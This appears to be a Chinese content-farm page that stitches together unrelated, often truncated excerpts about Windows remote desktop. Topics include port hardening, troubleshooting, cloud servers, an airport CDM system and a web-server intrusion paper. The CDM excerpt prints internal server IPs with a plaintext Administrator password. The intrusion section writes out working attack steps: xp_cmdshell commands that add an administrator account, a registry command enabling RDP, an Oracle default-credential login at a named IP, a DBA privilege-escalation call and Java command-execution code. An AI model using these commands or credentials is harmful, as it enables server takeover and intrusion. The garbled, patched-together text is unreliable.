时间:2023-02-27 11:06:37
导语:在远程桌面连接命令的撰写旅程中,学习并吸收他人佳作的精髓是一条宝贵的路径,好期刊汇集了九篇优秀范文,愿这些内容能够启发您的创作灵感,引领您探索更多的创作可能。
“远程桌面连接”的前身应该是Telnet。Telnet是一种字符界面的登陆方式。微软将其扩展到图形界面上,显示了异常强大的功能。
在日常工作交流中,我们常常会用到远程桌面连接功能,许多人会认为这样的功能简单得几乎不值一提,不过在实际使用过程中。我们有时会遇到各种特殊的远程桌面连接需求,要想顺利满足这些特殊的连接需求,就必须要掌握一些远程桌面连接的使用技巧。
让远程桌面连接端品躲避攻击
大家知道,在默认状态下远程桌面使用的端口一般为“3389”,如果我们不及时将这个端口号码更改掉的话。那么许多别有用心的黑客可能会利用这个端口,来远程控制和入侵本地工作站,以便窃取保存在本地工作站中的各类隐私信息。为了保护本地工作站的安全。我们可以尝试按照如下步骤,将远程桌面连接使用的默认端口号码更改成其他的端口号码:
首先,以特权身份登录进本地工作站系统,并用鼠标逐一单击系统桌面中的“开始”、“运行”命令,从弹出的系统运行框中,输入字符串命令“regedit”,单击“确定”按钮后,打开本地工作站的系统注册表编辑界面。
其次,在该编辑界面的左侧显示区域,用鼠标展开HKEY_LO-CAL_MACHINE注册表分支,从其后弹出的分支列表中依次选中SYSTEMk\CurrentControlSet\Control\TerminalServer\WdsrdpwdTd-stcp子键,在tcp子键所对应的右侧显示区域中,我们会看到一个名为PortNumber的子键,这个子键其实就是用来定义远程桌面连接端口号码的,将该子键的数值设置成其他端口号码,例如可以将其数值设置成“9999”。
完成数值修改操作后。我们再将鼠标定位于注册表分支HKEY_LOCAL_MACHINE\SYSTEM\CurrentControl\SetContro\Ter-minalServer\WinStations\RDP-Tcp,在RDP-Tcp子键所对应的右侧显示区域中,我们同样会看到一个名为PortNumber的子键,把该子键的数值也要一并修改过来,例如这里我们也要将它的数值修改成“9999”。
完成本地工作站的远程桌面连接端口号码后。我们日后需要通过远程桌面连接到该工作站时,我们需要打开对应工作站中的远程桌面连接设置窗口,并在其中设置好需要远程连接的工作站地址,之后单击“另存为”按钮将远程桌面设置保存成文件。接着用写字板之类的文本编辑程序将前面保存生成的RDP文件打开,并在文本编辑区域中手工输入一行“serverport:i:9999”这样的语句,再将该文件按照原名重新保存一下,这样一来我们日后就能通过远程桌面安全地连接到本地工作站中了。其他用户只要不知道新的远程桌面端口号码,他们就无法与本地工作站创建远程桌面连接了,那么本地工作站的安全性就会得到大大增强!
善用远程桌面连接进行传输文件
在局域网中传输文件时,相信多数人都会通过文件共享的方式来进行,可是设置成共享状态的目标文件很容易被其他人偷看到,而且一些别有用心的人还会通过共享通道对本地工作站实施攻击。为了确保在局域网中能够安全地传输文件,我们可以利用远程桌面连接程序中自带的磁盘映射功能,来让局域网中的文件传输进行得更安全、更简便,下面就是利用远程桌面功能进行文件传输的具体操作步骤:
最近,单位局域网中的一位员工向笔者反映,说他的计算机系统发生了一种蹊跷故障,当Windows系统刚启动成功这段时间,局域网中的其他计算机能正常访问他的共享文件夹,不过只要他离开自己的计算机一段时间,其他员工再访问他的共享资源时,就会遇到错误提示。
听了这位员工的故障描述后,笔者也觉得有点莫名其妙,于是立即赶到故障现场,仔细查看了故障计算机系统的运行状态,发现系统配置一切正常,使用ping命令测试网卡设备的连通性,也没有看出异常之处。之后,笔者尝试着将故障计算机系统空闲了一段时间,再用ping命令测试网卡设备,发现网卡设备的地址这次竟然无法ping通了,很显然问题出在计算机的网卡设备上。
为了弄清楚故障原因,笔者立即用鼠标右键单击故障计算机系统桌面上的
网卡设备,弹出目标网卡设备属性对话框。在这里,笔者依次进入各个不同的标签设置页面,对各项参数进行了认真检查。当切换到“电源管理”标签设置页面时,笔者终于找到了故障原因,原来这与Windows系统的电源管理功能有关,缺省状态下Windows系统只要在空闲时间达到规定数值后,就会自动关闭网卡设备的电源,以便有效节约电源消耗。在笔者尝试着将如图1所示页面中的“允许计算机关闭此设备以节约电源”选项取消选中时,上面的共享访问故障果然消失不见了。事后总结时,笔者认为网卡设备的电源管理属性,如果设置不当,很容易成为共享访问的设防“关卡”。
为了方便单位共享资源整合,有效改善网络管理效率,作为网络管理员的小周最近将局域网的工作组环境升级到了域环境,同时将单位所有员工的计算机全部添加到了指定域中,大大增强了对域计算机的控制力度。可是,当网管员小周尝试将某台安装了Windows 7系统的计算机添加到指定域中时,却看到有员工通过Windows XP系统的远程桌面连接程序,访问这台Windows 7系统的共享资源时,无论输入什么权限的登录账号,远程登录操作都不能成功。
在这台Windows 7计算机系统被成功添加到指定域中之前,小周曾经在自己的Windows XP系统中,远程访问过Windows 7计算机系统中的共享资源,这次再进行尝试时,发现远程桌面连接真
与传统的TCP/IPv4通信协议相比,TCP/IPv6通信协议的功能明显会强大许多。为了让单位局域网也能赶上潮流,笔者决定与时具进,着手将网络客户端系统的通信协议升级为TCP/IPv6。由于Vista以上版本系统默认都已经安装好了TCP/ IPv6协议,笔者只是对它们进行了简单的地址分配操作。而对于Windows XP系统来说,笔者特意重新安装了TCP/IPv6协议,之后也为它们分配了合适的地址。在分配地址时,操作很简单,依次单击“开始”|“控制面板”命令,双击系统控制面板窗口中的“网络和共享中心”图标,点击其后界面中的“更改适配器设置”按钮,切换到网络连接列表界面,用鼠标右键单击本地连接图标,执行右键菜单中的“属性”命令,弹出本地连接属性对话框。选中如图6所示界面中的TCP/IPv6协议选项,按下“属性”按钮,在其后界面中就能按照需要手工设置好合适的地址,单击“确定”按钮即可。将客户机的通信协议升级到TCP/IPv6版本后,明显感觉到它们的上网速度快了许多。
不过,有的客户端系统升级协议之后,无论是上网访问还是相互传输共享文件,都无法成功了,这让笔者感到十分蹊跷,为什么其他的客户端系统共享访问都正常,而有的系统就不正常呢?经过深入研究,笔者终于弄清楚了问题的原因,原来这些共享访问失败的故障客户端系统,无一例外地停用了系统服务“IP Help”,而该系统服务的主要工作就是对TCP/IPv6协议地址进行分析和连接,也就是说,TCP/IPv6协议的正常工作需要“IP Help”服务的支持。
找到了故障根源后,笔者立即用鼠标右键单击系统桌面上的“计算机”图标,执行快捷菜单中的“管理”命令,切换到计算机管理窗口,依次展开“计算机管
我马上大学毕业了,现在这段时间想好好学习一些服务器知识,可是我的电脑配置不高,无法在本地安装服务器系统。请问有没有什么在线服务器系统可以学习?(题号:20160902)
解题思路
如果要在本地电脑安装或学习其他系统,一种方法是在本地硬盘安装多系统(可以是实体系统或者虚拟系统),但是安装实体双系统对电脑技术要求较高,虚拟系统则要求电脑配置较高。另一种方法则是使用云系统,比如现在阿里云等提供虚拟主机的服务,这种虚拟云系统可以马上使用,而且可以任意选择自己所需的系统,无需在本地硬盘安装或者进行任何设置。因此云系统最适合初入职场的朋友选择使用。
解题方法
现在阿里云主机对学生有专门的优惠(最低9.9元/月),而且提供的全部是正版服务器系统,因此非常适合学生学习使用。首先登录,按提示注册一个阿里云用户(学生用户需提供学籍证明)。登录后点击“产品与服务云服务器ECS实例创建实例”,按提示购买一个云服务器,这里可以根据自己的实际需要选择操作系统,阿里云提供Windows Server、Freebsd、Ubuntu等主流常用的正版服务器系统,只要在“公共镜像”下自行选择即可(图1)。 选择需要的服务器系统
完成实例的创建并付费后,现在我们就可以开始使用远程登录的方式进行学习了。这里以Windows Server 2008为例。对于在网吧等公共场所使用电脑的用户,登录阿里云网站后打开上述创建的实例,点击其后的“管理更多终端登录”,在弹出的窗口中记住VNC登录密码,成功登录后点击“发送远程命令Ctrl+Del+Alt”,在打开的登录界面中按提示输入云系统的账户名和密码,进入系统后就可以开始学习了,这些都是正版的服务器系统(图2)。
VNC方式只要浏览器即可实现在线连接,但是实际操作较为麻烦。我们还可以使用远程桌面连接的方式实现。同上登录阿里云查看购买的实例,在这里记住服务器的公网IP地址,这个用于远程桌面登录(图3)。
在电脑上启动远程桌面连接,在“计算机名”下输入上述获得的公网IP地址,用户为在上述实例创建中设置的用户账户,成功连接后就可以在远程桌面上看到云服务系统,具体使用和本机安装的系统没有什么区别。这样大学生们通过低廉的花费就可以轻松学习各种正版服务器的使用了。
本期挑战题
题号:20161101
难度:4分
挑战题描述:同许多人一样,我喜欢浏览微信上的精彩内容,但是一旦没有网络就不能浏览。问题来了,有没有什么办法可以将微信上的内容给缓存下来并在无网的条件浏览呢?
题号:20161101
关键词 变电站;远程监控系统;远程桌面;综合自动化
中图分类号 TM7340 文献标识码 A 文章编号 1673-9671-(2012)102-0149-01
随着不断广泛应用和飞速发展的电力自动化系统技术,变电站的运行模式也大多变成了无人值班,这一现象在低于220kV的电力系统变电站内尤为普遍。为了能够随时监控到站内设备的运转情况,同时在第一时间内解决诊断设备出现的故障等问题,远程维护电力自动化系统就成为了大势所趋。
1 远程桌面
对于无人值班的电力自动化系统进行全时监控,并处理出现的问题和故障,一直以来都是国内相关科研人员的工作重点。然而尽管已经确实提供了一些工程方案,但都存在着如下几点问题:首先是由于可能存在着不同厂家生产的变电站自动化系统,致使系统维护的难度大为增加;其次是维护工作只有在全面掌握变电站运行情况的基础上才能展开,对于数据库的处理能力和库容量而言不堪重荷;再次是每种信息过于繁多的协议传输和采集方式;最后是远程维护系统单独对口各个变电站,则造成过大的成本投资等。因此,将远程维护方案建立在远程桌面的基础上,借由2M专网或调度数据网来实现监控机的远程控制,成为了更加切实可行的新技术。微软的远程桌面协议,是其操作系统的远程桌面功能工作的平台。借助RDP,即使在网络的另一端,对于远程计算机里的网络资源、应用程序和数据,客户端电脑都可以轻松实现控制,这样相应的服务就可以通过正在运行的远程服务器上的相应程序获得。比如:后台操作和登陆可以通过交互式进行,速度很快,也具备稳定的性能。远程主机借由该服务器登陆后,除了无法实现物理接触外,可以实现与本地电脑相同的命令运行、程序删除以及各项操作等内容。为了能够使数据在借助通信进行交互时的可靠性和安全性得到保证,加密和数字签名是RDP过程采取的两种办法,同时加密算法使用的是RC4和MD5,对于数据包整个在传输过程中的解密、加密,可以可靠、有效地完成。同时微软公司为了防止黑客窃取数据,进一步将远程桌面的安全级别提高,附加了一个安全认证的方式,对于信息的加密通过安全套接层来完成。
2 监控机操作系统升级
即便是发展至今的微软操作系统中,远程桌面功能能够实现的平台软件也只有3款:Windows 2003、Windows XP和Windows 2000 Server。Windows 2000目前广泛应用于国内的监控机操作系统,选择3个系统中的一个作为升级版本即可,之后将远程桌面功能开启。除了对远程监控机中的全部网络资源、文件和程序进行控制外,远程桌面并不影响到本地任何程序的正常运行,同时远程桌面还能够实现如下功能:首先是在远程会话中进行粘贴和剪切操作。剪贴板在多数中断服务器和远程桌面连接中可以共享,这样就实现了在剪贴板上,本地内容和远程桌面内容的一致同步,进而在本地电脑所运行的程序里,粘贴、剪切从远程桌面会话运行程序里的内容。比如在“远程桌面连接”窗口中的文档里,对图形和文本进行剪切和复制,之后在本地电脑的文档里进行粘贴。其次是将本地资源供给终端服务器使用。以网络上不同设置的组策略为根据,从而决定是否通过本地电脑上的智能卡、打印机、串行口和磁盘驱动器被终端服务器访问,叫做“资源重定向”。只有资源重定向被设置的组策略禁止,否则该资源在会话期间可以被终端服务器加以使用。比如,假设使用者决定允许终端服务器使用本地磁盘驱动器,即允许本地文件夹和文件可以被远程会话访问,那么就会大大简化将文件从终端服务器复制出来或者在终端服务器里复制进文件的过程。最后是中断服务使用快捷键功能。在“远程桌面连接”的窗口中点击“本地资源”的选项,可以实现多种同样的功能通过快捷键的形式在终端服务器上开始执行。
3 远程控制监控机的工作原理和内容
现在,以同步数字系列的专用光缆为基础,电力系统的通信网规模在我国已经初步形成,并且由于传统的中央信号、开光控制和继电保护装置系统,正在逐步地被高速LAN的厂站和现场总线的自动化系统取替,当远程终端单元属于非网络型时,调度数据网的接入可以通过改造从而实现;当IED不具备网络接口时,网络接入可以通过连接远动转换协议设备与串口进而实现,此种模式下无需改动任何的IED,因此可以预见的必然趋势是:网络化传输远动信息的模式。借助网络,维护和监控智能设备也更加简便可行。通常情况下,按照2个方向传输变电站的全部四遥信息:一则是借助RTU到集控站自动化系统或数据采集与调度监控系统;再则是对本地监控机进行直接传给。在对SCADA系统进行调度时的处理能力和数据库容量进行充分考虑后,加之将信息量减少,进而防治电网调度运行受到历史信息以及不分主次、大量的实时信息的干扰,在对SCADA系统进行调度时,通常只对重要的四遥信息进行接收,比如针对遥信而言,通常只对硬结点遥信进行采集。对于本地监控机来说,因为只有一个厂站是指定内容,原则上,对于该变电站的全部历史信息和实时信息加以接收,同时其功能十分强大。绝大多数的自动化系统均为一家厂商所制造,其综合自动化设备和本地后台监控系统一致,维护和监视自动化设备的工作,只需适当改造本地监控系统就能够得到实现和加强,做到不包含在SCADA系统中的信息,甚至是所有信息的查询、监视和采集。比如将RTU组态程序安装在国电南自的PSX600和南瑞继保公司的RCS-9700变电站自动化系统上以后,维护和监视RTU的工作就能通过网络直接进行,包括了RTU程序升级、对RTU收发码进行监视以及下装组态等功能。
4 远程桌面系统的特点及安全控制
首先,远程桌面图像监控系统对于无人值班的变电站非常适用,能够对变电站设备的运行情况以及防盗问题、防火问题、发热情况和操作情况进行监视,同时逐步结合现场操作人员的远方监视操作,如有必要,可以向上级计算机网络上传监控中心所收集到的信息和图像数据,便于网络用户进行调阅查看。其次,由于物理距离上变电站比较远,动辄数百、数十公里,其连接方式多为电话线、微波或光线进行通信,必须解压缩和压缩监控中心接收到的信号图像信息,所以与现场的模拟信号相比较而言,图像质量会稍有损失,为了避免过多地损失图像质量,应该对解压缩和压缩的方式慎重考虑选择。再次,布防和撤防功能要做到位。当工作人员在变电站时,应该撤防,避免误报警。当无人值守变电站时,应及时布防。最后,要明确镜头和云台是主要的控制对象,包括了变倍变焦、调整光圈、聚焦镜头、上下俯仰和左右旋转等功能。
5 结束语
以远程桌面系统为基础,对变电站等电力自动化系统进行远程运行、监控和维护的反感,不仅便于实现,而且投资额不大,其实际应用的意义非常重大。通过在梅亭集控站和芜湖供电公司的实际使用效果来看,具有非常大的功能效用和发展前景。该项技术的发展和完善,将对无人值班的电力自动化系统的监控工作产生积极作用。对于提高无人值班电力自动化系统运行的安全性有着直接的影响。
参考文献
微软windows xp以其出色的兼容性和移动性赢得了广泛的好评和认同,但是它也存在着大量系统漏洞,黑客利用系统的漏洞可以对电脑进行攻击,让你无法上网,对一些分区格式化,侵入计算机偷盗,从而造成巨大的的损失!
如何保证windows xp安全呢?比较好的办法就是下载windows安全补丁。microsofe公司会在网上提供一些免费的补丁,我们只要及时打补丁,就可以增强兼容性,堵上漏洞,增强系统的安全性!
windows xp安全漏洞主要有以下五种:
一、切换功能漏洞
windows xp快速用户切换功能存在漏洞,当你单击“开始”/注销/“切换用户”启动快速用户切换功能,在传统登陆方法下重试登录一个用户名时,系统会误认为有暴力猜解攻击,因而会锁定全部非管理员账号。
解决办法:单击控制面板/用户帐户/更改用户登录或注销的方式,取消“使用快速用户切换”,以便禁用用户快速切换功能。
二、即插即用漏洞
upnp亦称通用即插即用软件(全称universal plug and play),微软这个软件是基于互联网协议的,它允许不同的设备如电脑、扫描仪、打印机联成网络,可以在彼此之间自动识别,并进行通信,xp操作系统在发售时就已经激活了upnp功能。然而,upnp也存在安全漏洞。黑客可以利用该软件上的漏洞控制同一网络上的电脑,或者发动dos攻击。具体来讲,upnp服务可以导致以下两个安全漏洞:
(一)缓冲溢出问题
upnp存在缓冲区溢出问题,是windows有史以来最严重的缓冲溢出漏洞,当处理 notify 命令中的location字段时,如果ip地址、端口和文件名部分超长,就会发生缓冲区溢出,由此会造成服务器程序的一些进程,其内存空间的内容被覆盖。由于upnp服务运行在系统的上下文,攻击者如果利用漏洞成功,可以完全控制主机。
解决方法:对于win xp用户,应该立即安装补丁;对于win me用户,只有在运行了upnp的情况下才需要该补丁;对于win98用户,由于其中并没有upnp,只有当用户自己安装了upnp的情况下,才需要使用该补丁。
(二)系统容易被欺骗
对运行了upnp服务的系统实施攻击,只要向该系统的1900端口发送一个udp包,其中“location”域的地址指向另一个系统的chargen端口,就可能使系统进入一个无限的连接循环,这将会导致受影响系统 cpu 和内存占用率达100%,使远程xp系统完全不能使用而拒绝了服务,只有通过重启后系统才能恢复正
转贴于
常。
解决办法:完全关闭upnp服务,因为大多数的人都不用他们。请记住:服务开得越少,就越安全。单击xp的控制面板/管理工具/服务,双击“universal plug and play device host”服务,在启动类型中选择“已禁用”关闭upnp服务。
三、热键漏洞
热键打开程序很方便。当用户登陆win xp时,热键功能随之启动。如果你的电脑没有设置屏幕保护程序和密码,而你需要暂时离开电脑,办理其他事情,win xp就会在处于静止状态一段时间后进行自动注销,不过这种“注销”是一种假注销,你所有的后台程序都还在运行,与没有注销前几乎没有什么差别,因此其他人虽然进不了你的桌面,看不到你的电脑里放了些什么,但是却可以继续使用热键。比如打开n个大程序,破坏你的机器,打开并使用某个程序,特别是一些与网络有关的敏感程序(和服务)。
解决办法:在离开计算机的时候,还是按下windows键+l键,锁定计算机;或者打开屏幕保护程序、并设置密码;或者检查可能会带来危害的程序和服务的热键,取消这些热键。
四、远程控制漏洞
当连接建立的时候,windows xp远程桌面把账户名以明文发送给连接它的客户端。发送的账户名不一定是远端主机的用户账号,也可以是最常被客户端使用的账户名,网络上的嗅探程序可能会捕获到这些账户信息。
建立网络连接时,win xp远程桌面会把用户名以明文形式、发送到连接它的客户端。发送的用户名可以是远端主机的用户名,也可能是客户端常用的用户名,网络上的嗅探程序可能会捕获到这些账户信息。
安全对策:单击控制面板/系统/远程,取消“允许用户远程连接到这台计算机”,以便停止远程桌面使用。
五、“帮助和支持中心”漏洞
windows xp的“帮助和支持中心”功能,可以向用户提供集中化服务和帮助,用户和程序可以通过使用“”前缀执行uri链接来访问帮助和支持中心。由于帮助和支持中心程序没有有效的检查通过hcp协议传递来的信息,导致一个缓冲溢出漏洞存在。当用户与因特网联接时,黑客就可以利用这个安全漏洞,从一个网页或html格式电子邮件中的链接对存在这一缺陷的机器进行远程访问,能够打开或删除被攻击机器上的文件。
关键词:CDM COBT CTOT 航班时刻 系统运行效率
中图分类号:TV213.2 文献标识码:A 文章编号:1007-9416(2015)12-0000-00
1 CDM系统概述
近年来随着航班量不断增加,直接导致航班延误严重、正常率低,无法获得航班预计起飞时间,从而出现民航运行压力大,旅客长时间在飞机上等待而引发的一系列矛盾冲突和不安全问题。
CDM(collaborative Decision Making)即运行协同决策系统,该系统是基于资源共享和信息交换的系统,通过接收各种外部信息(航班计划、流量限制信息等),根据排序规则,产生离港航班队列,根据航班队列自动/人工生成进离港航班、拖拽飞机、飞越计划的各种电子进程单,管制员根据这些电子进程单记录地面管制信息,通过对电子进程单的拖拽、点击或修改电子进程单状态、内容,完成放行许可席、地面管制席、塔台管制席之间的管制移交,使用技术手段改善航班延误相关问题, 是一个开放性的信息采集、融合和共享平台。
2 CDM系统建设
CDM系统由运行态势、出港航班、进港航班、统计信息、系统管理、消息公告六个核心模块构成。运行协同决策系统工作流程为空管用户根据航空公司或航务单位提供FPL提交预计撤轮档时间(EOBT)输出计算撤轮档时间(COBT)、计算起飞时间(CTOT)、航空公司或航务单位在不晚于COBT前50分钟确认COBT是否可行,若可行,系统将COBT时间锁定;若COBT变化超出容差裕度时,航空公司或航务单位可与空管进行协调,重新确认。东北地区沈阳、大连、长春、哈尔滨均安装使用CDM系统,沈阳通过ATM设备引接深圳CDM数据,大连、长春、哈尔滨通过ATM设备引接沈阳CDM数据,从而引接深圳CDM数据,沈阳CDM用户主要是空管部门和航空公司,空管用户主要包括区调和塔台,区调和塔台通过交换网引接CDM数据,航空公司主要是南航和深航,南航和深航通过光纤引接CDM数据,各用户通过终端的操作,输入修改航班信息,协调出最有效率的航班信息。网络拓扑图如图1所示。
图1.沈阳CDM系统网络拓扑图
东北CDM系统服务器和核心网络设备建立于沈阳桃仙国际机场航管楼三层设备机房内,主要包括数据处理主机、数据库主机、信息接口主机、核心交换机、核心路由器等,通过专用光纤网络建立系统数据源引接和用户终端连接,包括相应的网络线路、接入交换机、接入路由器等。CDM系统采用SOA架构,数据库采用Oracle 10g,主要配置服务器16台终端(位于塔台、近进、区调、南航、深航、T3航站楼),磁盘存储1套,交换机4台,路由器2台,系统运行时监控界面如图2所示:
图2.CDM系统运行监控界面
上图右侧服务器提示红色,是不正常的,可自行登录服务器查找原因或者联系厂家工程师查找原因。
用户终端系统主要由航班动态、运行态势、协同工具、航班历史数据查询、航班信息统计等模块组成。能打开登录页面,表示系统正常运行。
3 CDM系统故障分析及处理方法总结
CDM系统在在沈阳地区从安装到运行近半年的时间,以下几个故障在值班过程中发现,联系厂家工程师,共同研究探讨出处理方法。
(1)机场排序系统与AIMS系统不同步,如何处理?监控电脑 WIN+R键,出现上图,输入mstsc,远程桌面连接10.20.102.162服务器, 输入用户:Administrator,密码:caac~123,打开服务界面,找到“AYATC ATMS AIMSIntegrated Winservice”服务并重启,重启后查看LOG记录,路径:D:AIMSIntegratedService/log/ATRS.log.txt
(2)CDM系统通过引接AIMS系统获取航班航班数据信息的,若CDM协同决策平台与AIMS不一致,如FPL状态不一致,如何处理?通过远程桌面连接登陆至10.20.102.162服务器,输入用户:Administrator,密码:caac~123,打开服务界面,找到“AYATC ATMS cdm Integrated Service” 项服务并重启,重启后查看LOG记录,路径:D:cdmIntegratedService/log/ATRS.log.txt
(3)停机位故障(含FIPS,ATMS系统),如何处理?通过远程桌面连接登陆至10.20.102.162服务器,输入用户:Administrator,密码:caac~123,打开服务界面,找到“SYATC ATMS ParkingBayService” 项(停机位获取子服务)服务并重启,重启后查看LOG记录,路径:D:ParkingBayService/log/ATRS.log.txt
(4)电子进程单无法登陆(含FIPS, ATMS系统),如何处理?通过远程桌面连接登陆至10.20.102.161服务器,输入用户:Administrator,密码:caac~123,打开服务界面,找到“SYATC ATMS AppWinService”项( 沈阳空管航班管理系统应用服务)并重启,重启后查看LOG记录,路径:D:DmanWinServer/AppServer/log/Atms.log
登陆CDM-领班主任(双击),菜单栏-设置-异常席位解锁,放行、塔台、地面、进近(双击解锁),运行界面如图3所示:
图3.电子进程单运行界面
(5)CDM系统引接雷达部门28所系统获取数据信息,若获取28所信息(SSR)失败,如何处理?通过远程桌面连接登陆至10.20.102.163服务器,输入用户:Administrator,密码:caac~123,打开服务桌面,直接重启桌面FDT程序(28所ScrCode获取程序)
(6)二十八所综合航迹捕获程序故障,如何处理?通过远程桌面连接登陆至10.20.102.174服务器,输入用户:Administrator,密码:caac~123,打开服务桌面RADAR程序(二十八所综合航迹捕获程序)press anykey to continue.选择网卡“1”。
(7)服务器或磁盘阵列柜中硬盘故障,如何处理?IBM服务器有保修和备件更换服务,发生硬盘故障先联系IBM技术支持,并按照技术支持人员的建议进行处理。首先确认硬盘故障(可通过状态灯闪烁确认),然后拔出故障硬盘并观察系统运行状态;插入新的硬盘,观察硬盘重建过程。
(8)报文乱码导致收报程序异常退出,如何处理?停止收报程序和串口通信程序,检查目前最后一份收报流水号,并确定乱码报文,停止自动要报功能。运行串口通信程序和要报程序,查看最新报文流水号,在转报机上手工要报但要跳过乱码报文,观察收报程序运行情况,重新打开自动要报功能,停止并重新运行收报程序。
(9)用户终端故障,如何处理?如果用户终端系统崩溃,或因硬件原因造成硬盘破坏,则需要对系统进行重装。重装有两种方法,一种是镜像克隆,即将其它CDM终端的镜像数据全部复制到该终端。方法如下:1)安装操作系统及软件。在光驱中插入可启动并具有克隆功能的WINPE光盘,重启终端,按F12键进入启动选项,选择光盘启动。启动后,用GHOST软件读取光盘或者U盘上的镜像文件,进行影像对整个磁盘的克隆。使用WINPE进行GHOST时,先进入WINPE系统,点击GHOST一键备份还原-手动运行GHOST-LOCAL-DISK-FromImage-找到GHOST文件位置,并点击Ghost文件,选择目标位置为第一个黑色的字体,显示的磁盘OK-OK-YES,即将开始还原系统。2)系统配置。因为克隆后新的终端上的设置和旧终端是相同的,为避免和旧终端发生冲突,必需进行网络设置(设置前不要接网线,设置好再接网线)。在网上邻居-属性-TCP/IP属性设置本机IP地址和子网掩码,最好设置和原来的一样,设置完用PING命令进行测试是否能连接到服务器。
选中我的电脑-属性-网络标识-属性-修改计算机名后重新启动。用本机超级用户登录,我的电脑-属性-本地用户和组-组-Administrastors组-添加-高级-系统提示输入用户名和密码。然后进行CDM客户端安装。
另一种方法为在终端安装操作系统、驱动及客户端软件安装等,比较复杂,至少需要1-2个小时,不推荐使用。
4结语
以上是本人在CDM运行期间所遇到比较典型的故障及处理总结,难免有不足之处,请各位领导同仁指正。
参考文献
下面是笔者经过长时间搜集积累的一些端口的知识,不看不知道,端口也和服务扯上联系,哪些端口和哪些服务有联系?请大家耐心看。
每一项服务都对应相应的端口,比如众所周知的WWW服务的端口是80,SMTP是25,FTP是21,Windows安装中默认的这些服务都是开启的。对于个人用户来说确实没有必要,关掉端口也就是关闭无用的服务。
关闭服务要通过“控制面板”/“管理工具”/“服务”来配置。
关闭80端口:关掉WWW服务。在“服务”中显示名称为“World Wide Web Publishing Service”,通过 Internet信息服务的管理单元提供 Web 连接和管理。
关掉25端口:关闭Simple Mail Transport Protocol (SMTP)服务,它提供的功能是跨网传送电子邮件。
关掉21端口:关闭FTP Publishing Service,它提供的服务是通过 Internet 信息服务的管理单元提供 FTP 连接和管理。
关掉23端口:关闭Telnet服务,它允许远程用户登录到系统并且使用命令行运行控制台程序。
还有一个很重要的就是关闭server服务,此服务提供 RPC支持、文件、打印以及命名管道共享。关掉它就关掉了Windows的默认共享,比如ipc$、c$、admin$等等,此服务关闭不影响你的其他操作。
上面的是一些常见的端口的关闭方法,下面介绍的是黑客经常入侵的两个端口。
3389端口
首先说明3389端口是windows的远程管理终端所开的端口,它并不是一个木马程序,请先确定该服务是否是你自己开放的。如果不是必须的,请关闭该服务。
3389端口关闭方法
在Windows 2000中
Windows 2000 server:开始-->程序-->管理工具-->服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务。
Windows 2000 pro:开始-->设置-->控制面板-->管理工具-->服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务。
在Windows XP中
在我的电脑上点右键选属性-->远程,将里面的远程协助和远程桌面两个选项框里的勾去掉,如图1所示。
139端口
139端口是NetBIOS Session的端口,用来支持文件和打印共享,要注意的是运行samba的unix机器也开放了139端口,功能一样。以前流光2000用来判断对方主机类型不太准确,估计就是139端口开放即认为是NT机。
139端口关闭方法
关键词:B/S服务器;入侵分析;安全防护
中图分类号:TP311文献标识码:A文章编号:1009-3044(2011)01-0029-02
Talk about Intrusion and Safety of Web Server
HUANG Jing-hua
(Sontan College Guangzhou University, Zengcheng 511370, China)
Abstract: With the popularization of computers, the Internet INTERNET rapid development, based on B/S side of the information system, such as office automation systems, electronic government, universities and other educational systems in all walks of universal access, further information has been widely used. How can we better protect the security of Web server makes the B/S information system running smoothly client does not seem to have overlooked important issues. This Windows 2003-based platform for multiple applications such as Microsoft SQL Server 2000, Oracle 10g, JSP / ASP services, application, analysis of the common Web server intrusion methods and security protection.
Key words: B/S server; intrusion analysis; safety
近年来,计算机普及、互联网INTERNET飞速发展。B/S端类型的服务业务平台已在教育、政企、科研等多个领域中得到广泛的应用,很多企业都将应用系统从C/S类型向B/S类型转变,如财务管理系统、飞机售票系统、高校教务系统等。B/S端信息系统已在各行各业普及使用,如何有效解决Web服务器的安全是信息化成功、企业稳定发展的关键,也是推广Web业务不可缺少的前提因素。
1 入侵Web服务器方式分析
1.1 SQL入侵
Sa弱口令入侵。Sa是SQLServer的管理员帐号,拥有最高权限,它可以执行扩展存储过程,并获得返回值,正因为这样,如安装在Web服务器中SQL数据库sa用户的口令给黑客获得的话,黑客就可以在Web服务器为所欲为。入侵过程如下:
首先有sql查询分析器连接上Web服务器上的SQL数据库,在查询分析器上输入” exec sp_addextendedproc 'xp_cmdshell', 'Xplog70.dll' ”命令执行,目的让对方数据库SQL的存储过程xp_cmdshell能够正常有权限被使用。
接着在查询分析器里添加一个管理员用户,语句为 “exec master..xp_cmdshell 'net user ceshi 98765321 /add' ;exec master..xp_cmdshell 'net localgroup administrators ceshi /add'”。
最后在查询分析器里开启远程计算机的远程桌面服务,语句为“
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp /v EnableWinStation /t REG_DWORD /d 1“。
1.2 Oracle入侵
ORACLE数据库默认安装以后有很多帐户密码都是默认的,如果管理员安全意识不高很容易被人利用从而获得系统权限。
首先要使用lsnrctl得到对方的SID号。使用lsnrctl工具连接对方IP的listener,在CMD里输入lsnrctl 进入lsnrctl后 执行 Set current_listener 目标IP 和Status命令,这个时候可以看到服务 china 和modose 这2个有一个是SID号;
接着安装个ORACLE的客户端,使用Sqlplus连接服务器,格式 sqlplus DBSNMP/DBSNMP@//202.98.123.79:1521/china 成功登陆,执行 select * from user_role_privs; 可以看出当前用户只具有CONNECT权限。利用Oracle本地PL/SQL漏洞进行权限提升,成功提升为DBA权限,命令如下:
SQL> Exec ctxsys.driload.validate_stmt('grant dba to dbsnmp');
最后借用Oracle支持的Java特性,创建可以执行系统命令的存储过程,增加管理员账号(Windows平台的Oracle默认以system账号运行,所以我们执行的命令也是以system账号权限执行),下面创建一个JAVA源程序,以便执行系统命令。创建名为”util”的JAVA程序的主体代码如下:public static int RunThis(String args) { Runtime rt = Runtime.getRuntime(); int RC = -1; try {Process p = rt.exec(args); int bufSize = 4096;
BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize);
int len; byte buffer[] = new byte[bufSize]; while ((len = bis.read(buffer, 0, bufSize)) != -1)
System.out.write(buffer, 0, len); RC = p.waitFor(); } catch (Exception e) { e.printStackTrace();
RC = -1; }
